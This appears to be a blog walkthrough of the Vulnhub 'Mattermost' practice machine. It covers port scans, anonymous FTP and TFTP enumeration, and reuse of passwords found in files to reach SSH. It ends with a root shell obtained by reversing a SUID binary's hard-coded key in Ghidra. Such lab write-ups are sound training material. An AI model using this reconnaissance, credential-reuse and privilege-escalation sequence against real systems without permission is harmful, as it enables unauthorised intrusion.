Vulnhub: Detailed Walkthrough of the Mattermost Machine

Mattermost

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24   |   Screen View: Unique Hosts                                                                                            
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.1.1.1        00:50:56:c0:00:01      1      60  VMware, Inc.                                                                                             
 10.1.1.151      00:0c:29:07:65:9f      1      60  VMware, Inc.                                                                                             
 10.1.1.254      00:50:56:ee:66:c6      1      60  VMware, Inc.      

Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 10.1.1.151.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.151 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-25 05:59 EST
Nmap scan report for bogon (10.1.1.151)
Host is up (0.0014s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.1.1.143
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e98be3460ec17fa21ac3df9d4654ad1c (RSA)
|   256 ff5b256809f5452b146866e0ce0027b3 (ECDSA)
|_  256 bbded2db03b75ccfd73bb72165215de3 (ED25519)
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Sorry, This Page Can't Be Accessed
|_http-server-header: Apache/2.4.29 (Ubuntu)
3389/tcp open  ms-wbt-server xrdp
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3657
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.segment.com/analytics.js/
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Sat, 25 Feb 2023 10:55:17 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: ntnkbqycxpy8jj9ig6xbyhttfo
|     X-Version-Id: 5.18.0.5.18.0.12da442d30d70d8726b0a9761a350d5a.false
|     Date: Sat, 25 Feb 2023 10:59:18 GMT
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0'>
|     <meta name='robots' content='noindex, nofollow'>
|     <meta name='referrer' content='no-referrer'>
|     <title>Mattermost</title>
|     <meta name='mobile-web-app-capable' content='yes'>
|     <meta name='application-name' content='Mattermost'>
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Sat, 25 Feb 2023 10:59:18 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ ftp 10.1.1.151                 
Connected to 10.1.1.151.
220 (vsFTPd 3.0.3)
Name (10.1.1.151:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||33940|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 06  2020 .
drwxr-xr-x    2 ftp      ftp          4096 Jan 06  2020 ..
226 Directory send OK.
ftp> cd /
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||39765|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 06  2020 .
drwxr-xr-x    2 ftp      ftp          4096 Jan 06  2020 ..
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||26272|)
550 Permission denied.
ftp> quit
221 Goodbye.

  1. Anonymous FTP login succeeds, but the directory exposed to the anonymous user is empty

  2. The anonymous user is not allowed to upload files (550 Permission denied)

  3. This FTP server version (vsftpd 3.0.3) has no exploitable vulnerability

Directory brute-forcing against ports 80 and 8065 turned up nothing. Following other people's writeups, the next step is a UDP scan.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ sudo nmap -sU -A -T4 10.1.1.151
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-25 06:22 EST
Nmap scan report for bogon (10.1.1.151)
Host is up (0.00047s latency).
All 1000 scanned ports on bogon (10.1.1.151) are in ignored states.
Not shown: 921 closed udp ports (port-unreach), 79 open|filtered udp ports (no-response)
MAC Address: 00:0C:29:07:65:9F (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms bogon (10.1.1.151)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1453.15 seconds

The scan did not reveal a TFTP service, although other people's scans did; UDP scanning really is unreliable. Note the 79 open|filtered UDP ports in the output: a UDP port that returns neither a reply nor an ICMP port-unreachable is reported as open|filtered, so a listening service such as TFTP on 69/udp can hide in that set without ever being listed as open.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ tftp 10.1.1.151      
tftp> ls
?Invalid command
tftp> ?
tftp-hpa 5.2
Commands may be abbreviated.  Commands are:

connect         connect to remote tftp
mode            set file transfer mode
put             send file
get             receive file
quit            exit tftp
verbose         toggle verbose mode
trace           toggle packet tracing
literal         toggle literal mode, ignore ':' in file name
status          show current status
binary          set mode to octet
ascii           set mode to netascii
rexmt           set per-packet transmission timeout
timeout         set total retransmission timeout
?               print help information
help            print help information
tftp> get ?     
Error code 1: File not found
tftp> get README.md
tftp> quit

The website's home page gives a hint:

The README.md file contains information about other softwares, files in a directory or archive of computer software.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ cat README.md 
Hello Admin,

Please use the following key: ComplexPassword0!

With this password, login to the Mattermost admin account on port 8065 succeeds.

After logging in, the posts mention "zoom" repeatedly in different forms, which looks deliberate. In the System Console there is a Zoom plugin; enabling it reveals a URL:

http://localhost/JK94vsNKAns6HBkG/AxRt6LwuA7A6N4gk/index.html

Replace localhost with 10.1.1.151.

Visiting that URL:

http://10.1.1.151/JK94vsNKAns6HBkG/AxRt6LwuA7A6N4gk/index.html
Hello Admin, FTP credentials help you edit, transfer and delete files from your site. This is why it's important to keep these credentials handy. FTP Credentials: ftpuser / ftppassword Make sure to keep these to yourself. 

This gives us the FTP username and password.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ ftp 10.1.1.151
Connected to 10.1.1.151.
220 (vsFTPd 3.0.3)
Name (10.1.1.151:kali): ftpuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||16561|)
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Jan 05  2020 .
drwxr-xr-x    4 ftp      ftp          4096 Jan 05  2020 ..
-rw-r--r--    1 ftp      ftp           220 Jan 05  2020 .bash_logout
-rw-r--r--    1 ftp      ftp          3771 Jan 05  2020 .bashrc
-rw-r--r--    1 ftp      ftp           807 Jan 05  2020 .profile
-rw-r--r--    1 ftp      ftp          8980 Jan 05  2020 examples.desktop
drwxr-xr-x    3 ftp      ftp          4096 Jan 05  2020 users
226 Directory send OK.
ftp> pwd
Remote directory: /home/ftpuser
ftp> cd ..
250 Directory successfully changed.
ftp> pwd
Remote directory: /home
ftp> ls -alh
229 Entering Extended Passive Mode (|||56868|)
150 Here comes the directory listing.
drwxr-xr-x    4 ftp      ftp          4096 Jan 05  2020 .
drwxr-xr-x   24 ftp      ftp          4096 Jan 01  2020 ..
drwxr-xr-x    3 ftp      ftp          4096 Jan 05  2020 ftpuser
drwxr-xr-x   18 ftp      ftp          4096 Jan 06  2020 mattermost
226 Directory send OK.
ftp> cd mattermost
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||62256|)
150 Here comes the directory listing.
drwxr-xr-x   18 ftp      ftp          4096 Jan 06  2020 .
drwxr-xr-x    4 ftp      ftp          4096 Jan 05  2020 ..
-rw-------    1 ftp      ftp          1590 Jan 05  2020 .ICEauthority
-rw-------    1 ftp      ftp          4615 Jan 06  2020 .bash_history
-rw-r--r--    1 ftp      ftp           220 Dec 31  2019 .bash_logout
-rw-r--r--    1 ftp      ftp          3771 Dec 31  2019 .bashrc
drwx------   16 ftp      ftp          4096 Jan 05  2020 .cache
drwx------   11 ftp      ftp          4096 Dec 31  2019 .config
drwx------    3 ftp      ftp          4096 Jan 05  2020 .dbus
drwx------    3 ftp      ftp          4096 Dec 31  2019 .gnupg
drwx------    2 ftp      ftp          4096 Jan 05  2020 .gvfs
drwx------    3 ftp      ftp          4096 Dec 31  2019 .local
drwx------    5 ftp      ftp          4096 Dec 31  2019 .mozilla
-rw-------    1 ftp      ftp            18 Dec 31  2019 .mysql_history
-rw-r--r--    1 ftp      ftp           807 Dec 31  2019 .profile
drwx------    3 ftp      ftp          4096 Jan 03  2020 .ssh
-rw-r--r--    1 ftp      ftp             0 Dec 31  2019 .sudo_as_admin_successful
-rw-------    1 ftp      ftp         17420 Jan 06  2020 .viminfo
drwxr-xr-x    2 ftp      ftp          4096 Jan 02  2020 Desktop
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2019 Documents
drwxr-xr-x    2 ftp      ftp          4096 Jan 03  2020 Downloads
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2019 Music
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2019 Pictures
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2019 Public
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2019 Templates
drwxr-xr-x    2 ftp      ftp          4096 Dec 31  2019 Videos
-rw-r--r--    1 ftp      ftp          8980 Dec 31  2019 examples.desktop
226 Directory send OK.
ftp> cd .ssh
550 Failed to change directory.
ftp> cd ..
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||45756|)
150 Here comes the directory listing.
drwxr-xr-x    4 ftp      ftp          4096 Jan 05  2020 .
drwxr-xr-x   24 ftp      ftp          4096 Jan 01  2020 ..
drwxr-xr-x    3 ftp      ftp          4096 Jan 05  2020 ftpuser
drwxr-xr-x   18 ftp      ftp          4096 Jan 06  2020 mattermost
226 Directory send OK.
ftp> cd ftpuser
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||27640|)
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Jan 05  2020 .
drwxr-xr-x    4 ftp      ftp          4096 Jan 05  2020 ..
-rw-r--r--    1 ftp      ftp           220 Jan 05  2020 .bash_logout
-rw-r--r--    1 ftp      ftp          3771 Jan 05  2020 .bashrc
-rw-r--r--    1 ftp      ftp           807 Jan 05  2020 .profile
-rw-r--r--    1 ftp      ftp          8980 Jan 05  2020 examples.desktop
drwxr-xr-x    3 ftp      ftp          4096 Jan 05  2020 users
226 Directory send OK.
ftp> cd users
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||18444|)
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Jan 05  2020 .
drwxr-xr-x    3 ftp      ftp          4096 Jan 05  2020 ..
drwxr-xr-x    2 ftp      ftp          4096 Jan 05  2020 mattermost
226 Directory send OK.
ftp> cd mattermost
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||58599|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 05  2020 .
drwxr-xr-x    3 ftp      ftp          4096 Jan 05  2020 ..
-rw-r--r--    1 ftp      ftp            11 Jan 05  2020 message
226 Directory send OK.
ftp> get message
local: message remote: message
229 Entering Extended Passive Mode (|||24960|)
150 Opening BINARY mode data connection for message (11 bytes).
100% |****************************************************************************************************************|    11       21.22 KiB/s    00:00 ETA
226 Transfer complete.
11 bytes received in 00:00 (12.94 KiB/s)
ftp> 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ cat message                    
Welcome!!!

From the FTP listing we also know that another user is mattermost, and Welcome!!! may well be that user's password.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ ssh mattermost@10.1.1.151
The authenticity of host '10.1.1.151 (10.1.1.151)' can't be established.
ED25519 key fingerprint is SHA256:f6h3XXHqKJMC9IrcBCv4Wg4VKZsnkE+S/I4L76lsg2w.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.1.151' (ED25519) to the list of known hosts.
mattermost@10.1.1.151's password: 
Permission denied, please try again.
mattermost@10.1.1.151's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.0.0-37-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Mon Jan  6 00:59:59 2020
mattermost@ubuntu:~$ id
uid=1000(mattermost) gid=1000(mattermost) groups=1000(mattermost),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare),130(ftp)
mattermost@ubuntu:~$ sudo -l
[sudo] password for mattermost: 
Sorry, user mattermost may not run sudo on ubuntu.
mattermost@ubuntu:~$ 

mattermost@ubuntu:~/Desktop$ find / -perm -4000 -type f 2>/dev/null

Privilege escalation

mattermost@ubuntu:~/Desktop$ cat README.md 
Hello User,

Your secret key is 48912.

Do not share this key with anyone.

!! NOTE:: This key is not valid after 30 days and has been changed by our internal systems.
!! NOTE:: Please contact the support desk to get new secret key.
mattermost@ubuntu:~/Desktop$ ./secret 
Hello Admin, Please enter the secret key:
48912
Your is either invalid or expired
.mattermost@ubuntu:~/Desktop$ 

The secret file turns out to have the SUID bit set, so download it to the Kali machine (here fetched over HTTP from port 8000 on the target).

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ wget http://10.1.1.151:8000/secret 
--2023-02-25 08:04:40--  http://10.1.1.151:8000/secret
Connecting to 10.1.1.151:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8584 (8.4K) [application/octet-stream]
Saving to: ‘secret’

secret                                100%[=========================================================================>]   8.38K  --.-KB/s    in 0s      

2023-02-25 08:04:40 (172 MB/s) - ‘secret’ saved [8584/8584]

Once it is on Kali Linux, decompile secret with Ghidra; the main function looks like this:

undefined8 main(void)

{
  long in_FS_OFFSET;
  int local_14;      /* the key read from stdin */
  long local_10;     /* saved stack-protector canary */
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_14 = 0;
  puts("Hello Admin, Please enter the secret key:");
  /* DAT_00100992 is the scanf format string, presumably "%d": reads an int into local_14 */
  __isoc99_scanf(&DAT_00100992,&local_14);
  if (local_14 == 0xf447) {                 /* hard-coded key: 0xf447 == 62535 */
    setuid(0);                              /* effective because the binary is SUID root */
    setgid(0);
    system("/bin/bash");                    /* spawns a root shell */
  }
  else {
    printf("Your is either invalid or expired\n.");   /* typo is in the binary itself */
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {   /* canary check */
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

From the decompiled code we can see that, after the secret key is entered, it is compared against the constant 0xf447. Use echo to convert 0xf447 to decimal (or any online converter will do):

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mattermost]
└─$ echo $((0xf447))
62535

That gives 62535. Now run ./secret on the target and enter 62535 as the key:

mattermost@ubuntu:~/Desktop$ ./secret
Hello Admin, Please enter the secret key:
62535
root@ubuntu:~/Desktop# cd /root
root@ubuntu:/root# ls -alh
total 40K
drwx------  5 root root 4.0K Jan  6  2020 .
drwxr-xr-x 24 root root 4.0K Jan  1  2020 ..
-rw-------  1 root root  265 Jan  5  2020 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Aug  5  2019 .cache
drwxrwxr-x  2 root root 4.0K Jan  6  2020 Desktop
drwx------  3 root root 4.0K Dec 31  2019 .gnupg
-rw-------  1 root root  168 Dec 31  2019 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root    0 Jan  2  2020 .sudo_as_admin_successful
-rw-------  1 root root 2.4K Jan  5  2020 .viminfo
root@ubuntu:/root# cd Desktop/
root@ubuntu:/root/Desktop# ls -alh
total 12K
drwxrwxr-x 2 root root 4.0K Jan  6  2020 .
drwx------ 5 root root 4.0K Jan  6  2020 ..
-rw-rw-r-- 1 root root   23 Jan  6  2020 local.txt
root@ubuntu:/root/Desktop# cat local.txt
are2020nehoc0601Great!

This yields a root shell and the root flag.

posted @ 2023-02-25 21:26  Jason_huawen